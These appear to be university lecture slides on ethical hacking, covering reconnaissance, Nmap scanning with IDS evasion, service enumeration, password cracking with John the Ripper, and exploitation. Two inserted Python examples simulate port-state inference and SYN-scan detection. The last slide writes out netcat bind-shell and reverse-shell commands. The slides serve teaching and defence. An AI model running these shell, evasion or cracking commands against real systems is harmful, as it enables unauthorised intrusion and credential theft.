
Dr. Igor Santos

Security of Information Systems

Ethical hacking

Contents

- What is Ethical Hacking?
- Phases
  ▪ Information Gathering
  ▪ Network Mapping & Scanning
  ▪ Password Attacks
  ▪ Service Enumeration
  ▪ Vulnerabilities Identification & Exploitation

What is Ethical Hacking?

Ethical Hacking

- A method to evaluate the security of a system or a network of systems by simulating an intruder attack
- It shows the actual impact of a vulnerability through controlled tests
- It searches for unknown vulnerabilities

Ethical Hacking

- Information level
  ▪ White Box
  ▪ Black Box
- Social Engineering?
- Physical Security?
- Dangerous tests? Exploits, DoS, …

Information Gathering

Information Gathering

- Gather information about the target before the attack
  ▪ Without (too much) contact
  ▪ As much information as possible
  ▪ The information can be very valuable in the future
- More information = more probability of success in the attack

Information Gathering

- Information we search for:
  ▪ Names and/or positions of workers
  ▪ E-mail addresses
  ▪ User names
  ▪ Public addresses, domains or URLs
  ▪ Used software and technologies
  ▪ Internal addresses or URLs
  ▪ Internal paths
  ▪ Data about the system configuration

Information Gathering

  ▪ Client and supplier names
  ▪ Physical location
  ▪ Telephone number
  ▪ …
- Iterative process: when information is found, new searches are performed

Information Gathering

- Sources
  ▪ Search engines
  ▪ DNS servers
  ▪ Whois servers
  ▪ Metadata
  ▪ Social networks
  ▪ P2P networks
  ▪ …

Information Gathering Types

- Passive methods: the target is not contacted directly
  ▪ Search engines
  ▪ Whois
  ▪ …
- Active methods: they leave some trace in the target
  ▪ DNS zone transfer
  ▪ Web site mirroring
  ▪ …

Information Gathering Techniques

- Internet service registration (whois): information about the IP record and its maintenance
- Search engines: gather public information from company and workers' web sites

Information Gathering Techniques

- DNS queries: identification of hosts by DNS querying
- Web site analysis: intentionally published information that may pose a security risk

Information Gathering Techniques

- New sources!
  ▪ Social networks
  ▪ Metadata
  ▪ P2P networks
  ▪ Job search websites

Search Engines - Google

- Google Hacking: searching Google for sensitive information, usually with malicious goals
- Johnny Long, Google Hacking for Penetration Testers
  ▪ http://www.hackersforcharity.org/ghdb/ (no longer maintained)
  ▪ http://www.exploit-db.com/google-dorks/ (its continuation, 9 Nov 2010)
- Cheat sheet: http://www.sans.org/mentor/GoogleCheatSheet.pdf

Search Engines - Google

- What to look for?
  ▪ Vulnerable applications (e.g., inurl:eStore/index.cgi?)
  ▪ Error messages (e.g., "Warning: mysql_query()" "invalid query")
  ▪ Files with sensitive information (e.g., filetype:sql "insert into")
  ▪ Websites with private reports (e.g., intitle:"Nessus Scan Report")
  ▪ Web server versions (e.g., "Microsoft-IIS/* server at", intitle:index.of)

Search Engines - Shodan

- http://www.shodanhq.com/
- A "different" search engine: it finds systems by performing searches based on their banner responses
  ▪ Computer search engine
- Filters: http://www.shodanhq.com/help/filters
- Examples:
  ▪ net:130.206.139.0/24
  ▪ port:22 country:ES

Search Engines - Netcraft

- Netcraft (http://news.netcraft.com) shows the following information given a domain:
  ▪ OS version
  ▪ Web server version
  ▪ Uptime

Search Engines

- Countermeasures
  ▪ Properly configure the "robots.txt" file: it indicates to search engines what they must NOT index
  ▪ Periodically audit the web site with these techniques in order to check that there is no access to sensitive information

Social Networks

- Who has a profile on Facebook or LinkedIn?
- Do we know how to handle privacy in social networks?
- Social Engineering: create a fake profile in order to obtain access to private profiles = lots of information!
- Social network search engines
  ▪ http://www.123people.com/
  ▪ http://www.pipl.com/

Social Networks

- Countermeasures
  ▪ Limit the presence in social networks
  ▪ Don't publish too much
  ▪ Don't publish automatically
  ▪ Don't accept every friendship request (we may not be the final victim but an attack vector)

Metadata

- Hidden information regarding a document
  ▪ Author
  ▪ Used application
  ▪ Date of creation
  ▪ Camera model (images)
  ▪ E-mail addresses
  ▪ …
- They enhance the information present in a document

Metadata - FOCA

- A tool that started as a metadata extractor and analyzer; now it is more than that:
  ▪ Document panel: searches several types of documents in Google, Bing and Exalead
  ▪ DNS Search panel: it uses different techniques to obtain more domain names
- Countermeasures: Metashield Protector, which cleans the metadata from documents

Network Mapping & Scanning

Network Mapping & Scanning

- Several techniques
  ▪ Host discovery
  ▪ Port scanning
  ▪ IDS (Intrusion Detection System) evasion
  ▪ Service and OS identification (fingerprinting)

Network Mapping & Scanning - Nmap

- Tool for network exploration and security auditing
- nmap [<Scan Type>...] [<Options>] {<target specification>}
- Options
  ▪ Scan type: -sS, -sX, -sU, …
  ▪ -p <ports>: ports to scan (separated by a comma, or "-" for a range; to scan all of them, -p 0-65535)

Network Mapping & Scanning

- Zenmap: front-end for nmap
  ▪ It draws a network map with the results
  ▪ Predefined scans

Host Discovery

- Identify online systems: first step for network mapping
- Classic method using ping: ICMP echo request; alive systems respond with ICMP echo reply
- It is also possible to send TCP packets and wait for the response of the online systems
- ARP ping in local networks

Host Discovery

- Nmap ping (-sP)
  ▪ ICMP echo request & ICMP timestamp request
  ▪ TCP ACK packet to port 80
  ▪ TCP SYN packet to port 443
- Example: nmap -sP 192.168.1.1

Port Scanning

- One of the most widespread hacking techniques
  ▪ Nmap in Hollywood: http://nmap.org/movies.html
- A computer executes several services that listen on TCP/UDP ports
- By means of scanning, we can locate open ports

TCP Port Scanning - TCP Connect scan

- TCP Connect scan: a TCP connection is established with the destination port (three-way handshake)
- A very reliable method to determine the port state
- Simple and easy to detect
  ▪ Generates too much noise
- nmap -sT <IP> -p <ports>

TCP Port Scanning - TCP Connect scan (diagrams)

- Open port
- Closed port
- Filtered port

TCP Port Scanning - SYN Scan

- SYN scan: if a listening port is found, the full connection is not established
  ▪ A RST is sent to finalize it
- Because the three-way handshake is not completed, a lot of systems don't log the connection attempt
- An IDS can easily detect it
- Quick and reliable
- nmap -sS <IP> -p <ports>

TCP Port Scanning - SYN Scan (diagrams)

- Open port
- Closed port
- Filtered port

UDP Port Scanning

- UDP is a protocol that is not connection oriented
- Closed ports return an "ICMP destination unreachable" packet
- If the ICMP traffic is filtered, the responses for the closed ports are not received: the port state cannot be determined conclusively
- nmap -sU <IP> -p <ports>

UDP Port Scanning (diagrams)

- Open/Filtered port
- Closed port
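The port-state rules behind the TCP connect, SYN and UDP scan diagrams, written out as an added example (not code from the slides or from Nmap). The Response type, the ICMP code sets and the follow-up table are assumptions chosen to mirror the slides; nothing is sent on the network.

```python
"""Port-state inference behind the TCP connect/SYN and UDP scan diagrams.
Added example, not code from the slides or from Nmap: each probe response
(or its absence) is mapped to the state a scanner would report, using
constructed Response values. Nothing is sent on the network."""

from dataclasses import dataclass
from typing import Optional, Tuple

@dataclass
class Response:
    proto: str                              # "tcp", "udp" or "icmp"
    flags: str = ""                         # TCP flags, e.g. "SA" (SYN/ACK), "RA" (RST/ACK)
    icmp: Optional[Tuple[int, int]] = None  # (type, code), e.g. (3, 3) = port unreachable

# ICMP "destination unreachable" (type 3) codes a scanner reads as "filtered".
TCP_FILTERED_CODES = {1, 2, 3, 9, 10, 13}
UDP_FILTERED_CODES = {1, 2, 9, 10, 13}      # code 3 means "closed" for UDP

def unreachable(resp: Response, codes: set) -> bool:
    return resp.proto == "icmp" and resp.icmp is not None and resp.icmp[0] == 3 and resp.icmp[1] in codes

def tcp_state(resp: Optional[Response]) -> str:
    """State inferred from the answer to the first SYN (-sT and -sS agree here)."""
    if resp is None:
        return "filtered"                   # silently dropped: no answer at all
    if resp.proto == "tcp" and "S" in resp.flags and "A" in resp.flags:
        return "open"                       # SYN/ACK: a service is listening
    if resp.proto == "tcp" and "R" in resp.flags:
        return "closed"                     # RST: host reachable, nothing listening
    return "filtered" if unreachable(resp, TCP_FILTERED_CODES) else "unknown"

def udp_state(resp: Optional[Response]) -> str:
    """UDP has no handshake, so silence is ambiguous: open or filtered."""
    if resp is None:
        return "open|filtered"              # many UDP services and all firewalls stay silent
    if resp.proto == "udp":
        return "open"                       # an application-layer reply
    if resp.proto == "icmp" and resp.icmp == (3, 3):
        return "closed"                     # ICMP port unreachable: conclusive
    return "filtered" if unreachable(resp, UDP_FILTERED_CODES) else "unknown"

def scanner_follow_up(scan: str, state: str) -> str:
    """What the scanner sends after a SYN/ACK; explains why -sS is often not logged."""
    if state != "open":
        return "nothing"
    if scan == "-sT":
        return "ACK, then close"            # handshake completed: the service sees a connection
    if scan == "-sS":
        return "RST"                        # handshake aborted: half-open, often unlogged
    raise ValueError("scan must be -sT or -sS")
```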

IDS evasion

- Techniques to avoid IDS/IPS
  ▪ Use of fragmented packets: distribution of an IP packet among various data blocks
    nmap -sS -f <IP> -p <ports>
  ▪ Spoofing of origin IPs to emulate multiple attackers, hiding our own (attacker) IP
    nmap -sS -D <IP1,IP2,…,IPN> <attacked_IP> -p <ports>

Fingerprinting

- Service fingerprinting: identification of the service listening on a TCP/UDP port
  nmap -sV <IP> -p <port>
- O.S. fingerprinting: identification of the operating system
  nmap -O <IP>

Network Scanning Countermeasures

- Disable unnecessary services
- Close ports
- Firewall / IDS / IPS
- ICMP traffic filtering
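An added example of the IDS countermeasure above (not code from the slides or from any IDS product): a half-open scan detector run over constructed packet records. The records, the threshold of 5 ports and the alert format are assumptions; the per-destination pass exists because the -D decoy technique on the previous slide spreads SYNs over spoofed sources.

```python
"""Half-open (SYN) scan detector over constructed packet records, the kind
of rule an IDS applies as a countermeasure to the -sS scan on the slides.
Added example, not code from the slides or from any IDS product. A source
that SYNs many distinct ports of a host without ever completing a handshake
is flagged; because -D decoys spread the SYNs over spoofed sources, the
per-destination view is checked as well."""

from collections import defaultdict

# Constructed client-to-server records: (src, dst, dport, tcp_flags), S=SYN, A=ACK.
PACKETS = [
    ("10.0.0.5", "10.0.0.20", 80, "S"), ("10.0.0.5", "10.0.0.20", 80, "A"),    # normal client
    ("10.0.0.9", "10.0.0.20", 22, "S"), ("10.0.0.9", "10.0.0.20", 25, "S"),    # one source,
    ("10.0.0.9", "10.0.0.20", 80, "S"), ("10.0.0.9", "10.0.0.20", 443, "S"),   # many ports,
    ("10.0.0.9", "10.0.0.20", 3306, "S"),                                       # no ACKs
    ("192.0.2.1", "10.0.0.30", 21, "S"), ("192.0.2.2", "10.0.0.30", 23, "S"),  # decoy-style:
    ("192.0.2.3", "10.0.0.30", 53, "S"), ("192.0.2.4", "10.0.0.30", 139, "S"), # one SYN per
    ("192.0.2.5", "10.0.0.30", 445, "S"),                                       # spoofed source
]

def half_open_ports(packets):
    """Map (src, dst) -> ports that got a SYN from src but no later ACK from src."""
    syn, acked = defaultdict(set), defaultdict(set)
    for src, dst, dport, flags in packets:
        if flags == "S":
            syn[(src, dst)].add(dport)
        elif "A" in flags:
            acked[(src, dst)].add(dport)           # third handshake step seen
    return {pair: ports - acked[pair] for pair, ports in syn.items()}

def detect_syn_scans(packets, threshold=5):
    """Return (kind, src, dst, n_ports) alerts for per-source and distributed sweeps."""
    alerts, by_dst = [], defaultdict(set)
    for (src, dst), ports in half_open_ports(packets).items():
        by_dst[dst] |= ports
        if len(ports) >= threshold:
            alerts.append(("syn-scan", src, dst, len(ports)))
    flagged = {a[2] for a in alerts}
    for dst, ports in by_dst.items():
        if dst not in flagged and len(ports) >= threshold:
            alerts.append(("distributed-syn-scan", "*", dst, len(ports)))
    return alerts

if __name__ == "__main__":
    for alert in detect_syn_scans(PACKETS):
        print(alert)
```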

Enumeration

Enumeration

- Get information through a network service
- What information?
  ▪ System user names
  ▪ E-mail addresses
  ▪ Other systems
  ▪ …

Enumeration

- Services
  ▪ FTP: anonymous / ftp-user-enum
  ▪ TFTP: without authentication!
  ▪ SMTP: VRFY and EXPN commands → smtpenum
  ▪ DNS: direct/reverse lookup and zone transfer
  ▪ HTTP: banner grabbing
  ▪ RPC: edump, rpcdump, rpcinfo
  ▪ NETBIOS: samrdump
  ▪ SNMP: snmpwalk, snmpcheck
  ▪ LDAP: brute force by means of the Guest user

Countermeasures - Enumeration

- Keep the services updated
- Disable unnecessary services

Password Attacks

Password Guessing

- Some or all of the data necessary to authenticate is unknown
  ▪ User: if the Information Gathering phase has been done correctly, we will have several system users
  ▪ Password: the password file is known, but it is encrypted; words are tested until the correct one is found

Password Guessing

- Systems store a password hash
  ▪ They do not store users' clear-text passwords
  ▪ One-way encryption function: it cannot be decrypted
  ▪ http://en.wikipedia.org/wiki/Cryptographic_hash_function

Password Guessing

- During a pentest we will collect password hashes
  ▪ Bad configurations
  ▪ Successful intrusion
- With administrative permission it is possible to dump the hashes of the passwords of system users
  ▪ Windows -> SAM
  ▪ Unix -> /etc/passwd, /etc/shadow

Attack Types

- Dictionary: it is based on a list of user names or passwords
  ▪ Common words
  ▪ Terms related to the audited organization
  ▪ Try until the right one is found: it should be on the list!
  ▪ Success depends on how good and/or extensive the dictionary is
  ▪ /pentest/passwords/wordlists

Attack Types

- Hybrid: it uses a dictionary, but variations are also introduced
  ▪ Examples: try dictionary words in lowercase and uppercase; A is changed to 4, S to 5, E to 3, ...

Attack Types

- Brute force: usernames or passwords are generated within a range and given a character set
  ▪ E.g., max 8 characters [A-Za-z]

John the Ripper

- Password cracking tool
- Able to break several algorithms: DES, MD5, SHA-1, LM (LAN Manager), ...
- You can save a session for later cracking

John the Ripper

- Single mode: quick test, difficult to succeed; it uses typical passwords and some variations
- john --single <password_file>

John the Ripper

- Wordlist mode: it tests with a dictionary file; quick
  ▪ Hybrid attack: --rules
- john --wordlist=<dictionary> <password_file>
- Dictionaries: /pentest/passwords/wordlists/

John the Ripper

- Incremental mode: it tries all possible combinations of passwords (brute force)
  ▪ Only letters (--incremental:alpha)
  ▪ Only numbers (--incremental:digits)
  ▪ Letters, numbers and some special characters (--incremental:lanman)
  ▪ All characters (--incremental:all)
- john --incremental:[mode] <password_file>

John the Ripper

- Show cracked hashes: john --show /etc/shadow

Other techniques

- Shoulder surfing
- Social Engineering
- Sniffing: capture the session logins
- Physical access
  ▪ Bypass -> Kon-Boot
  ▪ Password cracking: Ophcrack live CD (rainbow tables)

Vulnerabilities Identification & Exploitation

Vulnerabilities Identification & Exploitation

- Terminology
  ▪ Vulnerability
  ▪ Exploit (client-side, server-side, …)
  ▪ 0-day exploit
  ▪ Payload
  ▪ CVE (Common Vulnerabilities and Exposures): http://cve.mitre.org/

Vulnerabilities Identification & Exploitation

- Lots of vulnerability types:
  ▪ Configuration (not design)
  ▪ Input validation
  ▪ Directory traversal
  ▪ Command injection
  ▪ SQL injection
  ▪ Cross-site scripting (XSS)
  ▪ Buffer overflow
  ▪ …

Vulnerabilities Identification & Exploitation

- Vulnerability search
  ▪ Security Focus: http://www.securityfocus.com/vulnerabilities
  ▪ National Vulnerability Database: http://web.nvd.nist.gov/view/vuln/search
  ▪ CERT: http://cert.inteco.es/vulnSearch/Current_News/Vulnerabilities_1/vulnerability_search/?postAction=getVulns
  ▪ Microsoft Security Bulletins: http://www.microsoft.com/spain/technet/security/bulletin/ms10-oct.mspx
  ▪ Scanners: Secunia, Nessus, etc.

Vulnerabilities Identification & Exploitation

- Exploit search
  ▪ Exploit Database (Milw0rm continuation): http://www.exploit-db.com/
  ▪ Others: http://www.securiteam.com/exploits, http://securityvulns.com/exploits, http://www.web-hack.ru/exploit, http://tarantula.by.ru/localroot

Vulnerabilities Identification & Exploitation

- Metasploit: framework for vulnerability exploitation
  ▪ It helps in the development of new exploits
  ▪ It allows to define:
    ▪ Which exploit is going to be used
    ▪ Which payload is going to be launched
      Meterpreter: advanced payload without disk access (DLL injection) → less forensic evidence
    ▪ How it is going to be encoded (avoiding IDS, etc.)

Vulnerabilities Identification & Exploitation

- Maintaining the access - Backdoors
  ▪ Tiny Shell: Unix backdoor
  ▪ Hydrogen: backdoor from Immunitysec; it includes robust encryption and traffic hiding
  ▪ Radmin: Windows backdoor; a remote-desktop-like connection, very easy to use and with a lot of functions

Vulnerabilities Identification & Exploitation

- Netcat: it can be used as a backdoor
  ▪ Victim (server): nc -lp 4444 -e cmd.exe
  ▪ Attacker (client): nc -vv <IP victim> 4444
- Also as a "reverse shell":
  ▪ Attacker (client): nc -vvlp 4444
  ▪ Victim (server): nc -vv <IP attacker> 4444 -e cmd.exe
